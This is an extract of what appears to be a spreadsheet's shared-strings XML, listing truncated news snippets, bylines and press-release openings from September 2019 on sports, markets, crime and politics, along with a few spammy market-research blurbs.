    <t>Ireland will hope to continue their recent dominance over Scotland when the two teams clash in their World Cup opener. Joe Schmidt’s side...</t>
  </si>
  <si>
    <t>Abby Hart</t>
  </si>
  <si>
    <t>Location: Essex Fells, N.J. Company: Landscape Techniques This project began when the clients purchased the property immediately adjacent...</t>
  </si>
  <si>
    <t>Dublin, Sept. 18, 2019 (GLOBE NEWSWIRE) -- The "Connected Toys Market by Interacting Device (Smartphone-Connected Toys, App-Connected...</t>
  </si>
  <si>
    <t>SOURCE Transat A.T. Inc. Third quarter results are up; Acquisition of the Corporation is pending regulatory approvals For the third...</t>
  </si>
  <si>
    <t>LONDON (Reuters) - Britain's opposition Labour Party will ask finance minister Sajid Javid to make a statement in parliament on Monday on...</t>
  </si>
  <si>
    <t>Manchester United Under-23 defender Max Taylor returned to training this week after responding positively to cancer treatment. The...</t>
  </si>
  <si>
    <t>Nike Inc's first-quarter revenue and profit beat Wall Street estimates on Tuesday as the sportswear maker's strategy to sell sneakers and...</t>
  </si>
  <si>
    <t>Written by    Neha Bhaskar</t>
  </si>
  <si>
    <t>Investors, as well as the homebuyers, are looking for sophisticated hi-tech homes should check out Tata Eureka Park. The township is...</t>
  </si>
  <si>
    <t>The "Giant-Cell Arteritis Pipeline Insight, 2019" drug pipelines has been added to ResearchAndMarkets.com's offering. Giant-Cell Arteritis...</t>
  </si>
  <si>
    <t>By Paige McDermott</t>
  </si>
  <si>
    <t>AN on-the-run drug dealer who was being hunted by police after failing to attend a court hearing has been arrested. Paul Baveridge, from...</t>
  </si>
  <si>
    <t>By BRIAN WITTE Associated Press</t>
  </si>
  <si>
    <t>ANNAPOLIS, Md. (AP) — A real estate company once run by President Donald Trump's son-in-law has rejected a settlement offer from Maryland's...</t>
  </si>
  <si>
    <t>Symone Davis</t>
  </si>
  <si>
    <t>Suffolk is known for peanuts, the Great Dismal Swamp, and now art. This weekend, the city is showcasing their new community projects at...</t>
  </si>
  <si>
    <t>BALTIMORE, Sept. 5, 2019 /PRNewswire/ -- Kidfresh, the brand of wholesome frozen meals that adds vegetables and grains into foods that kids...</t>
  </si>
  <si>
    <t>Mumbai, Sep 18 (IANS): Be it playing Sita in "Siya Ke Ram" or Maa Lakshmi in her latest serial "Jag Jaanani Maa Vaishnodevi: Kahani Mata...</t>
  </si>
  <si>
    <t>ABC News Radio</t>
  </si>
  <si>
    <t>(NEW YORK) — More severe storms are expected in the Plains Wednesday as 90 damaging storm reports took place around the country Tuesday...</t>
  </si>
  <si>
    <t>Proceeds from shirt for anti-bullying foundation</t>
  </si>
  <si>
    <t>by Jonathan Mattise, The Associated Press</t>
  </si>
  <si>
    <t>SMYRNA, Tenn. — The Tennessee governor is refraining from weighing in on the attorney general’s request to schedule executions for nine...</t>
  </si>
  <si>
    <t>NEW YORK, Sept. 10, 2019 /PRNewswire/ -- On Sunday, September 8, 2019, Marble Collegiate Church unveiled its new ribbon initiative, Suicide...</t>
  </si>
  <si>
    <t>Ferrari’s Charles Leclerc topped the time charts in the opening practice session for the Russian Grand Prix.</t>
  </si>
  <si>
    <t>This interview is part of our new Blockchain In Insurance series, where we interview the world's leading thought leaders on the front lines...</t>
  </si>
  <si>
    <t>TORONTO — The head of the Desjardins financial group says many of the world's biggest problems are symptoms of widespread short-term thinking. Speaking at the Toronto Global Forum, Desjardins chief executive Guy Cormier called for a shift to a longer term mindset to deal with issues such as climate change, trade disputes, and inequality. His remarks during a panel discussion on the economy come as many governments and companies grapple with rapid change and growing disparity. A panelist representing the Coalition for Inclusive Capitalism said that governments need to create more inclusive capitalism to ensure the stability of democracies, as too many people are voting out of fear of the future. Coalition CEO Lynn Forester de Rothschild said companies are starting to accept the need for change, as seen in a recent statement from the Business Roundtable, which represents U.S. CEOs who employ more than 15 million people. The Roundtable said it's not just committed to the interests of shareholders but also to delivering value to customers, investing in employees, dealing fairly with suppliers, supporting communities, and generating long-term value. The Canadian Press</t>
  </si>
  <si>
    <t>The "2019 Urological Surgical Procedure Volumes" report has been added to ResearchAndMarkets.com's offering. This in-depth global...</t>
  </si>
  <si>
    <t>The Denver Broncos moved the ball at will against the Green Bay Packers, however three turnovers on offense spelled doom for a team with...</t>
  </si>
  <si>
    <t>Zynga (NASDAQ:ZNGA) and CooTek (Cayman) (NYSE:CTK) are both consumer discretionary companies, but which is the better stock? We will...</t>
  </si>
  <si>
    <t>NEW YORK (AP) — They're simple, cheap and now the most popular way for many people to invest in the U.S. stock market: index funds....</t>
  </si>
  <si>
    <t>NEW YORK, Sept. 23, 2019 /PRNewswire-PRWeb/ -- This past Saturday night the Jewish High Holidays were announced around the globe with the...</t>
  </si>
  <si>
    <t>The state of the economy plays a role in how millennials think about healthcare.</t>
  </si>
  <si>
    <t>Jim Cramer examines companies that are driving the data revolution at leading businesses.</t>
  </si>
  <si>
    <t>Dublin, Sept. 04, 2019 (GLOBE NEWSWIRE) -- The "Global Electric Vehicle Market (2019-2025)" report has been added to...</t>
  </si>
  <si>
    <t>NEW YORK, Sept. 20, 2019 (GLOBE NEWSWIRE) -- TG Therapeutics, Inc. (NASDAQ: TGTX), today announced that Michael S. Weiss, the Company’s...</t>
  </si>
  <si>
    <t>Marc Middleton</t>
  </si>
  <si>
    <t>We noted a few weeks back how WWE had filed to trademark "WWE's The Bump" as a potential show name. It was speculated that this could be...</t>
  </si>
  <si>
    <t>PITTSBURGH, Sept. 21, 2019 /PRNewswire/ -- The Pittsburgh Pierogi Festival returns to Kennywood Park on Sunday, September 22, 2019. This...</t>
  </si>
  <si>
    <t>Postmedia News                        More from Postmedia News;INSTAGRAM</t>
  </si>
  <si>
    <t>The jury on sun screen and vitamin D deficiency is still out. INSTAGRAM</t>
  </si>
  <si>
    <t>More than three dozen hemp plants were stolen and/or destroyed on Sunday at an outdoor hemp farm off Norwich Westerly Road, the grower...</t>
  </si>
  <si>
    <t>SAN FRANCISCO, Sept. 20, 2019 /PRNewswire-PRWeb/ -- Wine &amp; Spirits Magazine has unveiled the Top 100 Wineries of 2019, a diverse collection...</t>
  </si>
  <si>
    <t>By  James Dwan  @JamesDwan</t>
  </si>
  <si>
    <t>Ray Marsh this month retires from being warden of Skippers Island nature reserve after an association of 60 years.</t>
  </si>
  <si>
    <t>Cangrejos Deposit – Geotechnical and Metallurgical Drill Highlights: VANCOUVER, British Columbia, Sept. 04, 2019 (GLOBE NEWSWIRE) --...</t>
  </si>
  <si>
    <t>Report explores incentive plan research for hotel management companies. MCLEAN, Va. (PRWEB) September 30, 2019 Take a deep dive into the...</t>
  </si>
  <si>
    <t>New York, Sept. 19, 2019 (GLOBE NEWSWIRE) -- Increasing demand for specialty yeast ingredients in food &amp; beverage application, growth in...</t>
  </si>
  <si>
    <t>DUBLIN, Sept. 24, 2019 /PRNewswire/ -- The "Electron Beam Machining Market by Application (Welding, Surface Treatment, and Drilling),...</t>
  </si>
  <si>
    <t>CHIANG MAI, Thailand (Reuters) – Chinese panda experts and Thai officials on Thursday began preparing for an autopsy of beloved giant panda...</t>
  </si>
  <si>
    <t>Atria Investments LLC acquired a new stake in SPDR S&amp;P China ETF (NYSEARCA:GXC) during the second quarter, according to its most recent...</t>
  </si>
  <si>
    <t>SÃO PAULO, Sept. 24, 2019 /PRNewswire/ -- BRF S.A. ("BRF") today announces the early tender date results of its previously announced offer...</t>
  </si>
  <si>
    <t>Emily Crane For Dailymail.com</t>
  </si>
  <si>
    <t>Ryder Cambron, 15, vanished on Tuesday night after she left her home in Magnolia in Texas The teenager was spotted riding her UTV vehicle...</t>
  </si>
  <si>
    <t>Beddow Capital Management Inc. reduced its stake in Liberty Global PLC (NASDAQ:LBTYA) by 4.5% during the second quarter, according to the...</t>
  </si>
  <si>
    <t>The accounting, finance and IT recruiting firm reveals a refreshed look, enhanced functionality to celebrate its decade-long milestone</t>
  </si>
  <si>
    <t>Dicker Data Ltd (ASX:DDR) announced a interim dividend on Friday, September 20th, MarketIndexAU reports. Investors of record on Friday,...</t>
  </si>
  <si>
    <t>Ryan Gorman</t>
  </si>
  <si>
    <t>With House Speaker Nancy Pelosi announcing the opening of a formal impeachment inquiry into President Trump, it's crucial to understand...</t>
  </si>
  <si>
    <t>The Sunday papers cover a broad array of issues, though several of them relate to Brexit. The Mail on Sunday says Prime Minister Boris...</t>
  </si>
  <si>
    <t>Chicago Federal Reserve bank president Charles Evans said on Wednesday that the Fed may be able to avoid future repo market problems simply...</t>
  </si>
  <si>
    <t>R.J. Johnson</t>
  </si>
  <si>
    <t>National Security Adviser John Bolton was fired by President Donald Trump on Tuesday after the president said he and others in his...</t>
  </si>
  <si>
    <t>ST. CHARLES, Ill., Sept. 30, 2019 /PRNewswire/ -- Residents of Illinois soon will have another supplement to grid power with the recent...</t>
  </si>
  <si>
    <t>Australia's financial crime watchdog is auditing PayPal's compliance with money laundering and counter-terror laws. Its investigation...</t>
  </si>
  <si>
    <t>SPONSORED CONTENT -- (StatePoint) Sleep is essential to good health. Unfortunately, over a third of Americans are not getting enough sleep,...</t>
  </si>
  <si>
    <t>Presence of certain traits in UHMWPE makes it favorable for application in different industries. Specific characteristics of this type of...</t>
  </si>
  <si>
    <t>–NDT Announced Its Button-Free Solution on vivo NEX 3 SHANGHAI — New Degree Technology has announced that its “Touch Sense” technology is...</t>
  </si>
  <si>
    <t>Marcus Myles Media</t>
  </si>
  <si>
    <t>Article From: "Ad Age" Read full article Nature’s Bounty is ending its relationship with WPP’s VMLY&amp;R and moves to Donor. VMLY&amp;R loses...</t>
  </si>
  <si>
    <t>The Global Nasal Oxygen Tubes Market report is designed in a method that helps readers to acquire a complete knowledge about the overall...</t>
  </si>
  <si>
    <t>Stewart Middle might have a 'bunch of new players' making plays, but the Eagles are still producing the same results.</t>
  </si>
  <si>
    <t>Daily Hive Staff</t>
  </si>
  <si>
    <t>Unless you’ve been living under a rock, you know by now that 19-year-old Ontario native Bianca Andreescu was victorious against Serena...</t>
  </si>
  <si>
    <t>ROCKVILLE, Md.--(BUSINESS WIRE)--Sep 24, 2019-- A little over one year ago, New York WaterMaker™ sent shockwaves throughout the culinary...</t>
  </si>
  <si>
    <t>Fourth Quarter Highlights SAN JOSE, Calif., Sept. 10, 2019 (GLOBE NEWSWIRE) -- Zscaler, Inc. (Nasdaq: ZS), the leader in cloud security,...</t>
  </si>
  <si>
    <t>Maia Snow</t>
  </si>
  <si>
    <t>'It is scary. Nothing happens like this' A woman has described the moment she was told to 'get out' of her home after a fire broke out next...</t>
  </si>
  <si>
    <t>SAM PHILLIPS</t>
  </si>
  <si>
    <t>James McManus' landmark concussion lawsuit against Newcastle will focus on more than half a dozen incidents involving the former Knights...</t>
  </si>
  <si>
    <t>Dubai, United Arab Emirates, September 20, 2019 --(PR.com)-- iPaced today announced the appointment of Mr. Mohammad Shoaib as its chief...</t>
  </si>
  <si>
    <t>Leila Mead</t>
  </si>
  <si>
    <t>The USD 450 million ISLANDS programme seeks to implement regional and national solutions for preventing and managing waste and pollution in...</t>
  </si>
  <si>
    <t>By AMANDA SEITZ;By STEVE LeBLANC</t>
  </si>
  <si>
    <t>House Committee on Homeland Security member Rep. Ilhan Omar, D-Minn., speaks during a hearing on "meeting the challenge of white...</t>
  </si>
  <si>
    <t>Jeff Faraudo</t>
  </si>
  <si>
    <t>No. 23 Cal stayed unbeaten on Saturday, and the Bears did it with offense. Until the final play of the game where linebacker Evan Weaver...</t>
  </si>
  <si>
    <t>Sep, Sat 21 2019 - 10:00 AM to 2:30 PM</t>
  </si>
  <si>
    <t>PORTLAND, Ore., Sept. 25, 2019 (GLOBE NEWSWIRE) -- Puppet, the standard for automating the delivery and operation of the software that...</t>
  </si>
  <si>
    <t>25th September 2019 15:02:06 Hours Sri Lanka Police Headquarters this morning (25) extended a warm welcome to the Commander of the Army,...</t>
  </si>
  <si>
    <t>Greg Hunter</t>
  </si>
  <si>
    <t>Lot’s of new developments in regards to the “Russia Hoax” conspiracy perpetrators… Greg Hunter gives The Weekly News Wrap-Up via...</t>
  </si>
  <si>
    <t>His wife and daughter are in the hospital.</t>
  </si>
  <si>
    <t>Kolkata, Sep 06 (UNI): Former West Bengal Chief Minister Buddhadeb Bhattacharya was admitted in a private hospital in South Kolkata on...</t>
  </si>
  <si>
    <t>Sio Capital Management LLC increased its position in shares of Alexion Pharmaceuticals, Inc. (NASDAQ:ALXN) by 101.9% during the second...</t>
  </si>
  <si>
    <t>Teresa Graham</t>
  </si>
  <si>
    <t>Pictet Asset Management Ltd. reduced its stake in PPG Industries, Inc. (NYSE:PPG) by 12.5% during the second quarter, according to the...</t>
  </si>
  <si>
    <t>Premium Market Insights reports titled “Deodorization System Market” and forecast to 2027 gives a detailed analysis of the market with key company profiles. Deodorization System market is evaluated based on two segments i.e., by type and application and covers essential statistics and details for current and future market scenarios. The report actively includes informative aspects relating to product developments, launches, and trends, to assist market players, shareholders, and investors in strategic decision making. Check for the sample here – https://www.premiummarketinsights.com/sample/TIP00015058 The report also puts forward the current and future market scenario derived precisely from a thorough analysis of the markets across five major regions: North America, Europe, Asia-Pacific (APAC), Middle East and Africa (MEA), and South &amp; Central America. The exhaustive PEST analysis is done for each region to assess major external factors which may influence Deodorization System Market in the coming years. The market study also includes the key drivers expected to boost the market growth and restraining factors along with future opportunities during the forecast. Deodorization System Market is likely to showcase symbolic growth opportunities owing to growing demands for Industrial Wax across the globe. The market report highlights top ten companies’ operation strategy in the market through a descriptive SWOT analysis of each company, business overview, products and services, financial statements of last three years, and key developments and product launches by the company in recent years. The List of companies covered in this Reports are: 1.Alfa Laval 2. Andreotti Impianti S.P.A 3. Compro International 4. Desmet Ballestra 5. DVC Process Technologists Pvt. Ltd. 6. Gianazza International S.P.A 7. Goyum Screw Press 8. Hum Oil and Fat Technologies 9. Myande Group Co. Ltd. 10. SAFAL Industries The insights also cover the production, value, market share, and growth rate of these top manufacturers and investigate the competitive landscapes for a better understanding of the market scenario. The report is intended to help the readers develop a practical and intelligent approach to market dynamics and exploit opportunities accordingly. For Purchase this report: https://www.premiummarketinsights.com/buy/TIP00015058 About Premium Market Insights: Premium Market Insights is a one stop shop of market research reports and solutions to various companies across the globe. We help our clients in their decision support system by helping them choose most relevant and cost effective research reports and solutions from various publishers. We provide best in class customer service and our customer support team is always available to help you on your research queries. Our commitment to customer service is best exemplified by free analyst support that we offer to our clients which sets us apart from any other provider. Contact Info: Name: Sameer Joshi Email: [email protected] Organization: Premium Market Insights Phone: +1-646-491-9876 Download Best WordPress Themes Free Download Download Best WordPress Themes Free Download Download Premium WordPress Themes Free Premium WordPress Themes Download download udemy paid course for free download lava firmware Premium WordPress Themes Download online free course TagsDeodorization System Deodorization System Advantages Deodorization System Forecast Deodorization System Market Deodorization System Share Deodorization System Size Deodorization System Trend</t>
  </si>
  <si>
    <t>1d ago 13.3K The Toroidion 1MW concept is a Finnish supercar which comes with a “revolutionary” 48V high-performance powertrain. This...</t>
  </si>
  <si>
    <t>Takumi Fuji had a comfortable 9 to 5 job in an office as an IT support specialist for the Commonwealth Bank of Australia but had to give it...</t>
  </si>
  <si>
    <t>Reese Witherspoon's 15-year-old son is already a "better" driver than she is because she gets easily distracted when she's behind the wheel.</t>
  </si>
  <si>
    <t>by CHRIS LEES</t>
  </si>
  <si>
    <t>The State Government is moving to clean up the derelict Cape Richards Resort on the northern tip of Hinchinbrook Island, north of...</t>
  </si>
  <si>
    <t>By Paul F. Stillwaggon</t>
  </si>
  <si>
    <t>Flex space (combination of office and warehouse) conveniently located in business section of Bridgewater. Offers great possibilities for...</t>
  </si>
  <si>
    <t>InForGrowth.com introduces a research report may focus on Global Bio-based Adhesives Industry 2019 Market Research Report published through...</t>
  </si>
  <si>
    <t>WFLA 8 On Your Side Staff</t>
  </si>
  <si>
    <t>TAMPA (WFLA) – A security breach at DoorDash has exposed the personal information of approximately five million people. The food delivery...</t>
  </si>
  <si>
    <t>Sir Paul McCartney spent the day speaking to schoolchildren ahead of the launch of a new book.</t>
  </si>
  <si>
    <t>Dusty Martin thinks it's "cool". The Richmond megastar is the sole AFL player to win two Norm Smith medals, two premiership medals and a...</t>
  </si>
  <si>
    <t>Paul Vanderhoeven                        More from Paul Vanderhoeven</t>
  </si>
  <si>
    <t>It couldn’t have gone much better for the FC London men in the first leg of their League1 Ontario semifinal Saturday night in...</t>
  </si>
  <si>
    <t>Historic brick mansion built in 1760 is moved 50 miles on a BARGE in a two-week operation that cost $ 1M – after a buyer wanted a Georgian...</t>
  </si>
  <si>
    <t>CHICAGO, Sept. 5, 2019 /PRNewswire-PRWeb/ -- The Surge Institute, a national non-profit organization, whose mission is to elevate and...</t>
  </si>
  <si>
    <t>A panel of bankers has ruled that some investors in Thomas Cook's credit derivatives worth as much as $2.7 billion are eligible for a...</t>
  </si>
  <si>
    <t>SÃO PAULO, Brazil, Sept. 6, 2019 /PRNewswire-PRWeb/ -- Christie® is pleased to announce that it is the Gold Sponsor of the Smart City...</t>
  </si>
  <si>
    <t>RALEIGH, N.C. (AP) — A court-ordered directive for more openness in the North Carolina redistricting process is leading to actions directed...</t>
  </si>
  <si>
    <t>Jeremy Hainsworth</t>
  </si>
  <si>
    <t>Photograph By cookelma/iStock While police routinely seek B.C. highway camera surveillance footage, the provincial government...</t>
  </si>
  <si>
    <t>By Tonya Simpson</t>
  </si>
  <si>
    <t>Crowdfunding is a popular way to raise money for nonprofits or for personal use, but if you're planning to use an online platform make sure...</t>
  </si>
  <si>
    <t>Crystal Vranich, a native of Pennsylvania who has published one other novel and currently lives in Texas with her husband and son, has...</t>
  </si>
  <si>
    <t>HONG KONG (Reuters) – Groups of China supporters pulled down “Lennon Walls” of anti-government protest messages across Hong Kong on...</t>
  </si>
  <si>
    <t>Michael Nedelman</t>
  </si>
  <si>
    <t>Nebraska health officials on Monday announced the state's first death due to severe lung disease linked to vaping, bringing the nationwide...</t>
  </si>
  <si>
    <t>A recent survey conducted by the Los Angeles County Department of Public Health found that more than 15 percent of adult residents in Los...</t>
  </si>
  <si>
    <t>Tony Gutierrez STAFF</t>
  </si>
  <si>
    <t>Texas Rangers’ Isiah Kiner-Falefa (9) sprints down the first base line after hitting run-scoring single as Elvis Andrus, center, and...</t>
  </si>
  <si>
    <t>20th Anniversary of the Rise of the Tomb Raider 75% 2.49 € A Criminal Past for Deus Ex: Mankind Divided 80% 2.39 € [19659004] ACA NEOGEO...</t>
  </si>
  <si>
    <t>TORRANCE, Calif., Sept. 19, 2019 /PRNewswire/ -- Emmaus Life Sciences, Inc. (OTC: EMMA), a leader in sickle cell disease treatment, today...</t>
  </si>
  <si>
    <t>ROCKVILLE, Md. --(BUSINESS WIRE) Argan, Inc. (NYSE: AGX) (“Argan” or the “Company”) today announced financial results for its second...</t>
  </si>
  <si>
    <t>The Presidential Anti-Corruption Commission (PACC) is pursuing a separate investigation into the "anomalous" implementation of good...</t>
  </si>
  <si>
    <t>By Nassim Benchaabane St. Louis Post-Dispatch</t>
  </si>
  <si>
    <t>ST. LOUIS — A motorcyclist who died after he collided with a van in south St. Louis on Friday morning has been identified. Erskine...</t>
  </si>
  <si>
    <t>The stock of Veritone Inc (NASDAQ:VERI) registered an increase of 9.29% in short interest. VERI’s total short interest was 3.56M shares in...</t>
  </si>
  <si>
    <t>LAS VEGAS - Two Dutch tourists who wanted to take video of Area 51 have pleaded guilty to misdemeanor trespass and illegal parking...</t>
  </si>
  <si>
    <t>PM Scott Morrison will talk trade and security with US President Donald Trump in Washington. The White House will become a sea of yellow...</t>
  </si>
  <si>
    <t>NEW YORK, Sept. 18, 2019 /PRNewswire/ -- KEY FINDINGS Aramid fibers are high-end specialty synthetic products used in various industries...</t>
  </si>
  <si>
    <t>China's new Daxing International Airport in Beijing, which is estimated to have been worth $11 billion, was inaugurated by President Xi...</t>
  </si>
  <si>
    <t>Chinese telecoms equipment maker Huawei Technologies Co is joining forces with China Mobile to potentially enter a dispute to buy...</t>
  </si>
  <si>
    <t>PICKERING, ON / ACCESSWIRE / September 18, 2019 / Renforth Resources Inc. (CSE:RFR)(OTC Pink:RFHRF) ("Renforth" or the "Company") is...</t>
  </si>
  <si>
    <t>More pensioners are at risk from a “bonanza” of fraud following the decision to scrap universal free TV licences for the over-75s,...</t>
  </si>
  <si>
    <t>STEVE HERRICK Associated Press</t>
  </si>
  <si>
    <t>CLEVELAND (AP) — Carlos Carrasco's return to Progressive Field didn't produce the results he wanted. Carrasco received a standing ovation...</t>
  </si>
  <si>
    <t>Synovus Financial Corp boosted its stake in shares of Enterprise Products Partners L.P. (NYSE:EPD) by 7.0% in the 2nd quarter, according...</t>
  </si>
  <si>
    <t>China Natural Resources ( NASDAQ:CHNR) and Iamgold ( NYSE:IAG) are each small-cap fundamental parts companies, however which is the greater...</t>
  </si>
  <si>
    <t>By Dan Whitcomb LOS ANGELES (Reuters) - A senior environmental scientist and her husband were on the dive boat that caught fire and sank...</t>
  </si>
  <si>
    <t>SINGAPORE, Sept. 26, 2019 /PRNewswire/ -- Kenon Holdings Ltd.'s (NYSE: KEN) (TASE: KEN) ("Kenon") subsidiary OPC Energy Ltd. ("OPC")...</t>
  </si>
  <si>
    <t>MORE than a third of trains in the UK were late in the first three months of this year, shocking new figures have revealed. Nearly 700,000...</t>
  </si>
  <si>
    <t>JERUSALEM — Prime Minister Benjamin Netanyahu is calling for a boycott of an Israeli TV channel for producing the new HBO docudrama "Our Boys," which he condemned as anti-Semitic. Netanyahu says the series slanders Israel internationally. The show, co-created by Israeli and Palestinian filmmakers, presents a dramatized rendition of the chaotic events of June 2014 following the abduction of three Israeli teens in the West Bank. It set off a cascade of events leading to that summer's Gaza war. Netanyahu was widely condemned Sunday for the remarks, part of his pre-election assault on the media. Netanyahu has previously accused the Keshet network of "committing a terror attack against democracy." The station aired leaked reports of police investigation into corruption charges against him. Netanyahu says Keshet executives tarnish him "on a daily basis." The Associated Press</t>
  </si>
  <si>
    <t>FRESNO, Calif., Sept. 5, 2019 /PRNewswire-PRWeb/ -- PrideStaff, a national, franchised staffing organization, is pleased to announce that...</t>
  </si>
  <si>
    <t>Anafi. Bepop. Disco. Hydrofoil. Paris, France-based mostly Parrot's drone portfolio runs the gamut from fixed-winged plane to lightweight...</t>
  </si>
  <si>
    <t>PHILADELPHIA (AP) -- Philadelphia 76ers forward Mike Scott was involved in a fight with Eagles fans while tailgating outside the stadium...</t>
  </si>
  <si>
    <t>David PurdumESPN Staff Writer</t>
  </si>
  <si>
    <t>The Kansas City Chiefs will kick off the season as Super Bowl favorites at multiple Las Vegas sportsbooks. The Chiefs moved ahead of the...</t>
  </si>
  <si>
    <t>At the Safeway Open, Sebastian Munoz and fellow Latin American pros comment on golf's global reach in the world. At the Safeway Open,...</t>
  </si>
  <si>
    <t>Grist</t>
  </si>
  <si>
    <t>Giving Compass’ Take: • At the U.N. Climate Action Summit last week, smaller countries made large commitments to combatting climate...</t>
  </si>
  <si>
    <t>THE BE POSITIVES is a northern conundrum. Consisting of Mike Seal (Guitar, Piano &amp; Vocals), Rob Hatton (Bass &amp; Vocals), Simon Mayne (Lead...</t>
  </si>
  <si>
    <t>LAKE BUENA VISTA, Fla., Sept. 30, 2019 /PRNewswire-PRWeb/ -- The National Literacy Summit's Lifetime Achievement Award is given to a...</t>
  </si>
  <si>
    <t>Ben Higgins, Hume Leader</t>
  </si>
  <si>
    <t>Hume City’s FFA Cup hopes rest on the approval of a marquee signing from Football Federation Australia.</t>
  </si>
  <si>
    <t>MIAMI (AP) — A Florida preacher has been charged with raping two young girls. The Miami Herald reports 54-year-old Yunior Beltres is...</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — Several Democratic presidential candidates have lined up to call for the impeachment of Supreme Court Justice Brett...</t>
  </si>
  <si>
    <t>Ptah</t>
  </si>
  <si>
    <t>Statistics on all NHS admissions into hospitals in England in 2018-19 have been published today by NHS Digital.</t>
  </si>
  <si>
    <t>Simone Gorman-Clark</t>
  </si>
  <si>
    <t>The countdown is on to the 13th annual Caloundra Music Festival on the Sunshine Coast this Queen’s Birthday long weekend. The beautiful...</t>
  </si>
  <si>
    <t>DUBAI — Iran signed a $440 million contract on Saturday with local company Petropars to develop the Belal gas field in the Gulf, Iranian...</t>
  </si>
  <si>
    <t>Jennifer Huffman</t>
  </si>
  <si>
    <t>The first residents of Register Square complex in downtown Napa could move into their new townhomes within the next three to six weeks. So...</t>
  </si>
  <si>
    <t>By Chris Mills Rodrigo</t>
  </si>
  <si>
    <t>Japan's environment minister announced Tuesday that the country will have to dump radioactive water from the Fukushima power plant into the...</t>
  </si>
  <si>
    <t>By ANA VECIANA-SUAREZ Tribune News Service P.T. Barnum, the 19th century circus showman who would've given the Kardashians a run for their...</t>
  </si>
  <si>
    <t>BOWIE, Md. (AP) — Fire officials in Maryland say a small plane has crashed into a vehicle on a highway next to an airport, injuring four...</t>
  </si>
  <si>
    <t>Matt Encarnacion</t>
  </si>
  <si>
    <t>Newly-retired skipper Paul Gallen has urged Croa to reclaim the trademark toughness and grit which helped the club win its first NRL...</t>
  </si>
  <si>
    <t>Hurricane Dorian came to a catastrophic day-long halt over the north-west Bahamas, flooding the islands of Abaco and Grand Bahama with...</t>
  </si>
  <si>
    <t>CHANEL KINNIBURGH, Mercury</t>
  </si>
  <si>
    <t>A PRIMROSE Sands man accused of importing automatic knife parts to the state has pleaded guilty to the charge.</t>
  </si>
  <si>
    <t>A family which ran two businesses has left the “rat race” to live off-grid in a woodland community. Kirsty and Nick Tizard moved from...</t>
  </si>
  <si>
    <t>DUBLIN, Sept. 23, 2019 /PRNewswire/ -- The "Understanding the Clinical Diagnostics Customer Experience: Results of the 2019 Survey of...</t>
  </si>
  <si>
    <t>Valqari, creator of the patented Smart Drone Delivery Mailbox and provider of last inch solutions for drone deliveries, has teamed up with...</t>
  </si>
  <si>
    <t>Here's a look inside Apple's flagship Fifth Avenue Store, known as the "cube," in New York City. It reopens on Friday and has been closed...</t>
  </si>
  <si>
    <t>Medium</t>
  </si>
  <si>
    <t>Asparagus, eggs, tomatoes, fish, spinach… all staple foods that are invaluable for your brain to achieve its full potential. Continue...</t>
  </si>
  <si>
    <t>Bungie head honcho Pete Parsons has revealed that the former Halo developer will ship at least one non-Destiny title by 2025, as the company strives to become one of the ‘best entertainment companies’ on the planet. The news comes just ahead of the launch of Destiny 2: Shadowkeep, which is the fourth major expansion for the shared-world shooter sequel after Curse of Osiris, Warmind, and Forsaken. Bungie To Launch Non-Destiny Game By 2025 Speaking during an interview with IGN, Parsons also said the studio is aiming to transform Destiny over the next six years, and has a ‘pretty specific path’ mapped out. “Our vision ultimately through 2025 is to become one of the world’s best entertainment companies,” said Parsons. One, is we need to begin transforming Destiny. The Destiny that we really believe in, like, the thing we think Destiny needs to become. I think you’ve seen it in the vid doc, like, the single evolving world, we needed to focus on that. So, by 2025 we have a pretty specific path to make sure we transform Destiny and that we have other franchises within the marketplace. I think the long-term vision of Bungie would be, we have worlds like Destiny that are great places to go and build friendships in. And we begin to introduce new worlds that people care a lot about. Destiny was released back in September 2014 for PlayStation 3, PlayStation 4, Xbox 360, and Xbox One. The game received two years worth of DLC support spanning multiple expansions before Bungie turned its attention to Destiny 2, which arrived for PS4 and Xbox One in September 2017. Earlier this year, the studio split from Activision, its publishing partner with whom it had signed a 10-year contract with. As such, Bungie now has full control over the Destiny IP, and one of its first plans is to turn the series into a free-to-play with Destiny 2: New Light. Stay tuned to PSU.com for more coverage on Destiny 2. Source: IGN</t>
  </si>
  <si>
    <t>Mike Hill</t>
  </si>
  <si>
    <t>Preston Council set bailiffs on THOUSANDS of people last year - Lancashire Evening Post</t>
  </si>
  <si>
    <t>A couple who want their severely disabled daughter to keep getting life support treatment are waiting for a judge’s ruling after a High...</t>
  </si>
  <si>
    <t>Hector Chalfant</t>
  </si>
  <si>
    <t>Analysts expect BeyondSpring Inc. (NASDAQ:BYSI) to report $-0.27 EPS on October, 22.They anticipate $0.27 EPS change or 50.00 % from last...</t>
  </si>
  <si>
    <t>Shareholder rights law firm Robbins Arroyo LLP announces that a purchaser of MacroGenics, Inc. (NASDAQ: MGNX) filed a class action...</t>
  </si>
  <si>
    <t>By Daniel Welsh</t>
  </si>
  <si>
    <t>The How Do You Sleep? singer came out as non-binary earlier this year.</t>
  </si>
  <si>
    <t>Holzer &amp; Holzer, LLC is investigating whether certain statements made by DXC Technology Company (“DXC Technology” or the “Company”) (NYSE:...</t>
  </si>
  <si>
    <t>By SFC Media</t>
  </si>
  <si>
    <t>Watch the key moments from Southampton's 3-1 home defeat to AFC Bournemouth in the Premier League.</t>
  </si>
  <si>
    <t>Andrei Evbuoma</t>
  </si>
  <si>
    <t>Summary Natural gas futures go on a late session rally Friday to finish higher after being neutral much of the day; October contract...</t>
  </si>
  <si>
    <t>Aleix Espargaro warns his strong MotoGP Aragon Grand Prix weekend is not the "reality" of Aprilia's true pace and admits the manufacturer...</t>
  </si>
  <si>
    <t>Originally posted on https://royaltyplumbing.com/plumbing-basics-how-it-all-works/ All sorts of things flow through your house. People...</t>
  </si>
  <si>
    <t>Packers podcast: The Packers defense carries the day in win over the Chicago Bears.</t>
  </si>
  <si>
    <t>Great ideas come from great minds, not necessarily from the biggest organization. Los Angeles, CA – September 10, 2019 /MarketersMedia/ —...</t>
  </si>
  <si>
    <t>Pakistan’s leader has denounced his Indian counterpart and warned that any war between the nuclear rivals could “have consequences for the...</t>
  </si>
  <si>
    <t>Univar Inc (NYSE:UNVR) was the recipient of some unusual options trading activity on Monday. Stock investors purchased 5,472 call options...</t>
  </si>
  <si>
    <t>SANTA MONICA, Calif., Sept. 13, 2019 /PRNewswire/ -- The Who has one of the greatest rock legacies in music history, they're one of the...</t>
  </si>
  <si>
    <t>SOURCE: General Mills Editor’s note: This is the latest post in our “You Grow, Girl!” series highlighting female farmers – from the...</t>
  </si>
  <si>
